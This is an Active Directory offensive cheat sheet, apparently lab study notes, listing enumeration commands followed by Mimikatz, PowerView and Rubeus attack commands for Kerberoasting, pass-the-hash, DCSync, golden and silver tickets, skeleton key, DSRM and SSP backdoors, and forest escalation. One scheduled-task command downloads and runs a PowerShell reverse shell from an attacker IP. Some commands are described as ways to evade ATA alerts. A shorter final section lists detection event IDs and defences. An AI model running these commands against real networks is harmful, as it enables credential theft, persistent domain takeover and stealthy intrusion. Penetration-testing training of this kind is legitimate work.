1) Enumeration using AD Module and PowerView (or any 1)
1.1) PowerShell:
$ADClass = [System.DirectoryServices.ActiveDirectory.Domain]
$ADClass::GetCurrentDomain()
$context = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain','cyberwarfare.corp')
$ADClass::GetDomain($context)
1.2) AD Module:
Get-ADDomain
Get-ADDomain -Identity cyberwarfare.corp
(Get-ADDomain).DomainSID
Get-ADDomainController
Get-ADDomainController -Domain cyberwarfare.corp -Discover -verbose
Get-ADUser -Identity studentuser1 -Properties *
Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property | select Name
Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description
Get-ADComputer -Filter * | select Name
Get-ADComputer -Filter 'OperatingSystem -like "*Windows Server 2016 Standard*"' -Properties OperatingSystem | select Name,OperatingSystem
Get-ADComputer -Filter * -Properties *
Get-ADGroup -Filter * -Properties *
Get-ADGroup -Filter 'Name -like "*admin*"' | select Name
Get-ADGroupMember -Identity "Domain Admins" -Recursive (Members of DA)
Get-ADPrincipalGroupMembership -Identity studentuser1 (Group Membership)
GPO Enumeration: -
Get-ADOrganizationalUnit -Filter * -Properties *
Trust Enumeration: -
Get-ADForest
(Get-ADForest).Domains
Get-ADTrust
Get-ADTrust –Identity cyberwarfare.corp
1.3) Using PowerView: -
Get-NetLocalGroup -ComputerName enterprise-dc -Recurse
Get-NetDOmain
Get-NetDOmain -Domain cyberwarfare.corp
Get-DomainSID
Get-NetDomainController
Get-NetDomainController -Domain cyberwarfare.corp
Get-NetUser
Get-NetUser -UserName emp1
Get-UserProperty
Get-ObjectAcl -SamAccountName studentuser1 –ResolveGUIDs
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=cyberwarfare,DC=corp').Access
Invoke-ACLScanner -ResolveGUIDs
Get-NetForest
Get-NetForestDomain
Get-NetDomainTrust
Get-NetDomainTrust –Domain cyberwarfare.corp
2) Attacks
2.1) Kerberoasting:
-> Identification:
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Get-NetUser –SPN
-> Abuse:
Add-Type -AssemblyNAme System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "cyberwarfare/serviceacc"
OR
Request-SPNTicket
klist.exe
Invoke-Mimikatz -Command '"kerberos::list /export"'
python.exe .\tgsrepcrack.py < dict > < exported_ticket >
2.2) Targeted Kerberoasting: -
Get-DomainUser -Identity user1 | select serviceprincipalname
Get-ADUser -Identity user1 -Properties ServicePrincipalName | select ServicePrincipalName
Set-DomainObject -Identity user -Set @{serviceprincipalname='what/what'}
OR
Set-ADUser -Identity user -ServicePrincipalNames @{Add='what/what'}
Add-Type -AssemblyNAme System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "what/what"
OR
Request-SPNTicket
klist.exe
Invoke-Mimikatz -Command '"kerberos::list /export"'
python.exe .\tgsrepcrack.py < dict > < exported_ticket >
2.3) Lateral Movement:
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
Invoke-Mimikatz -Command '"sekurlsa::ekeys"' -ComputerName @("sys1", "sys2")
Invoke-Mimikatz -Command '"sekurlsa::pth /user:admin /domain:cyberwarfare.corp /aes256: /run:powershell.exe"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\krbtgt"'
2.4) Privilege Escalation: Unconstrained Delegation
Get-NetComputer -UnConstrained
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}
2.5) Printer Bug Abuse:
https://github.com/leechristensen/SpoolSample
.\MS-RPRN.exe \\Unconstrained_delegation_mach \\Main-DC
(Attacker Machine - cpature hash of DC computer account)
.\Rubeus.exe monitor /interval:5
.\Rubeus.exe ptt /tikcet:< captured_Ticket >
Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\krbtgt"'
3) Persistence:
3.1) Golden Ticket:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' –Computername Enterprise-dc
(hash of krbtgt account)
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:S-1-5-21-xxxxxx-xxxxx6-xxxxxxxxx /krbtgt:< krb_hash > /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
3.2) Silver Ticket (CIFS access):
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:S-1-5-21-2xxxxx7-252xxxxx-xxxxx5708 /target:enterprise-dc /service:cifs /rc4: /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
(HOST ticket for scheduling tasks)
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:S-1-5-21-xxxxxx-xxxxx-1xxxxx708 /target:enterprise-dc.cyberwarfare.corp /service:HOST /rc4:xxx /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
schtasks /create /S enterprise-dc.cyberwarfare.corp /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object
Net.WebClient).DownloadString(''http://192.168.100.X:8080/Invoke-PowerShellTcp.ps1''')'"
schtasks /Run /S enterprise-dc.cyberwarfare.corp /TN "STCheck"
3.3) Skeleton Key:
(DA required )
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName enterprise-dc.cyberwarfare.corp
(Access any machine with valid username and 'mimikatz' password)
Enter-PSSession –Computername enterprise-dc.cyberwarfare.corp –credential cyberwarfare\Administrator
3.4) DSRM Password:
(Extract DA hash, Requires DA privileges)
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername enterprise-dc.cyberwarfare.corp
(Compare the Administrator hash with the Administrator hash of below command)
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername enterprise-dc.cyberwarfare.corp
(Change Logon Behaviour for the DSRM account )
Enter-PSSession -Computername enterprise-dc.cyberwarfare.corp
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
(PTH of DSRM account)
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:cyberwarfare.corp /user:Administrator /ntlm: /run:powershell.exe"'
ls \\enterprise-dc.cyberwarfare.corp\C$
Enter-PSSession -ComputerName enterprise-dc -Authentication Negotiate
3.5) Custom SSP: -
- Drop the mimilib.dll to system32 and add mimilib to:
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages:
$packages = Get-ItemProperty
HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages'| select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages
OR
Invoke-Mimikatz -Command '"misc::memssp"'
local logons are visible to "C:\Windows\system32\kiwissp.log"
3.6) AdminSDHolder ACLs (Requires DA): -
FULLCONTROL PERMISSIONS (PowerView): -
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName emp1 -Rights All -Verbose
Reset Passwords -
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName emp1 -Rights ResetPassword -Verbose
Check DA permissions on emp1: -
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'emp1'}
Abusing FullControl (powerview):
Add-DomainGroupMember -Identity 'Domain Admins' -Members notDA -Verbose
Abusing ResetPassword (PowerView):
Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose
Add rights for DCSync(PowerView): -
Add-ObjectAcl -TargetDistinguishedName 'DC=cyberwarfare,DC=corp' -PrincipalSamAccountName emp1 -Rights DCSync -Verbose
Set-ADACL -SamAccountName emp1 -DistinguishedName 'DC=cyberwarfare,DC=corp' -GUIDRight DCSync -Verbose
Execute DCSUNC as emp1:
Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\krbtgt"'
Intro about Azure AD: -
AD Connect synchronizes hashes every two minutes, in an Enterprise Environment, the MSOL_ account will be excluded from tools like ATA! This will allow us to run DCSync without any alerts!
4) Child to Forest Root: -
4.1) Trust key:
[In] trust key from child to parent:
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName child.enterprise-dc
OR
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Invoke-Mimikatz -Command '"kerberos::golden /domain:child.cybewarfare.corp /sid: /sids: /rc4: /user:Administrator /service:krbtgt /target:cyberwarfare.corp /ticket:C:\AD\Tools\kekeo\x64\trust_tkt.kirbi"'
HOST and RPCSS for WMI
HOST and HTTP for PowerShell Remoting and WinRM
tgs::ask /tgt:C:\AD\Tools\kekeo\x64\trust_tkt.kirbi /service:CIFS/enterprise-dc.cyberwarfare.corp
OR
.\asktgs.exe .\trust_tkt.kirbi CIFS/enterprise-dc.cyberwarfare.corp
misc::convert lsa tkt.kirbi
.\kirbikator.exe lsa .\< ticket.kirbi >
ls \\enterprise-dc.cyberwarfare.corp\c$
4.2) SID History:
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:child.cyberwarfare.corp /sid: /krbtgt: /sids: /ptt"'
ls \\enterprise-dc.cyberwarfare.corp\c$
Enter-PSSession enterprise-dc.cyberwarfare.corp
Avoid Suspicious logs: -
Invoke-Mimikatz -Command '"kerberos::golden /user:enterprise-dc$ /domain:cyberwarfare.corp /sid:S-1-5-21-xxxx-2xxxx-xxxxxxxxx /groups:516
/krbtgt:< child > /sids:S-1-5-21-xxxx-37xxxx478-2xxxxxxxx6-516,S-1-5-9 /ptt"'
S-1-5-21-xxxxxx-xxxxxx-xxxxxxxx-516 – Domain Controllers
S-1-5-9 – Enterprise Domain Controllers
Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\Administrator /domain:cyberwarfare.corp"'
5) SQL server enumeration: -
Discovery (SPN Scanning)
Get-SQLInstanceDomain
Check Accessibility
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
Gather Information
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
< Impersonation >
6) Detection and Defense - Golden Ticket
6.1) Golden Ticket: -
Event ID
– 4624: Account Logon
– 4672: Admin Logon
Get-WinEvent -FilterHashtable @{Logname= 'Security';ID=4672} -MaxEvents 1 | Format-List –Property *
6.2) Silver Ticket: -
Event ID
– 4624: Account Logon
– 4634: Account Logoff
– 4672: Admin Logon
Get-WinEvent -FilterHashtable @{Logname= 'Security';ID=4672} -MaxEvents 1 | Format-List –Property *
6.3) Detection and Defense - Skeleton Key
Events
− System Event ID 7045 - A service was installed in the system. (Type Kernel Mode driver)
Events ("Audit privilege use" must be enabled)
– Security Event ID 4673 – Sensitive Privilege Use
– Event ID 4611 – A trusted logon process has been registered with the Local Security Authority
Get-WinEvent -FilterHashtable @{Logname='System';ID=7045} | ?{$_.message -like "*Kernel Mode Driver*"}
(Run lsass.exe as protected process)
New-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name RunAsPPL -Value 1 -Verbose
Get-WinEvent -FilterHashtable @{Logname='System';ID=12} | ?{$_.message -like "*protected process*"}
6.4) DSRM Detection:
Event ID 4657 - Audit creation/change of
HKLM:\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior
6.5) Malicious SSP:
Event ID 4657 - Audit creation/change of HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages
6.6) kerberoasting:
Security Event ID 4769 – A Kerberos ticket was requested.
Since 4769 is logged very frequently on a DC. We may like to filter results based on the following information from logs:
− Service name should not be krbtgt
− Service name does not end with $ (to filter out machine accounts used for services)
− Account name should not be machine@domain (to filter out requests from machines)
− Failure code is '0x0' (to filter out failures, 0x0 is success)
− Most importantly, ticket encryption type is 0x17
Get-WinEvent -FilterHashtable @{Logname= 'Security';ID=4769} -MaxEvents 1000 | ?{$_.Message.split("`n")[8] -ne 'krbtgt' -and $_.Message.split("`n")[8] -ne '*$' -and $_.Message.split("`n")[3] -notlike '*$@*' -and $_.Message.split("`n")[18] -like '*0x0*' -and $_.Message.split("`n")[17] -like "*0x17*"} | select -
ExpandProperty message
6.7) Unconstrained Delegation:
- Limit Privileged users sessions to DC or required servers.
6.8) ACL Attacks
Events
– Security Event ID 4662 (Audit Policy for object must be enabled) – An operation was performed on an object
– Security Event ID 5136 (Audit Policy for object must be enabled) – A directory service object was modified
– Security Event ID 4670 (Audit Policy for object must be enabled) – Permissions on an object were changed
6.9) Selective Authentication:
In an inter-forest trust, if Selective Authentication is configured, users between the trusts will not be automatically authenticated. Individual access to domains and servers in the trusting domain/forest should be given.
7) ATA useful for detecting: -
- > Recon: Account enum, Netsession enum
- > Compromised Credentials Attacks: Brute force, High privilege account/service account exposed in clear text, Honey token, unusual protocol (NTLM and Kerberos)
- > Credential/Hash/Ticket Replay attacks.
7.1) Misc
If we have NTLM hash of a DC, we can extract NTLM hashes of any machine account using netsync.
Invoke-Mimikatz -Command '"lsadump::netsync /dc:enterprise-dc.cyberwarfare.corp /user:enterprise-dc$ /ntlm:< hash_of_DC_computer_account > /account:$"'
Forge a Golden Ticket with SID History of the Domain Controllers group and Enterprise Domain Controllers Group (ATA Bypass): -
Invoke-Mimikatz -Command '"kerberos::golden /user:enterprise-dc$ /domain:cyberwarfare.corp /sid:< SID > /groups:516 /krbtgt:< SID > /sids:S-1-5-21-2xxxx3-xxxx-240xxxxx-516,S-1-5-9 /ptt"'
